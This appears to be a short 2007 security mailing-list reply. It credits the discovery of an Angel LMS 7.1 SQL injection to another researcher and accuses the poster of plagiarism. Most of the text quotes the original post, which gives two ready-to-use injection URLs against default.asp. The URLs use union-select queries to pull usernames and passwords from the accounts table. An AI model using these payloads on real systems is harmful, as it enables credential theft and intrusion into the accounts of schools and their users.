# Credit: # Exploit discovered by Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com http://www.milw0rm.com/exploits/3390 Plagiarism sucks. /str0ke On 1 Mar 2007 16:06:06 -0000, Guns@inbox.com <Guns@inbox.com> wrote: > # Angel LMS 7.1 Remote SQL Injection > # by Guns > > #All User Accounts# > http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--" > > #Account Passwords# > http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--" >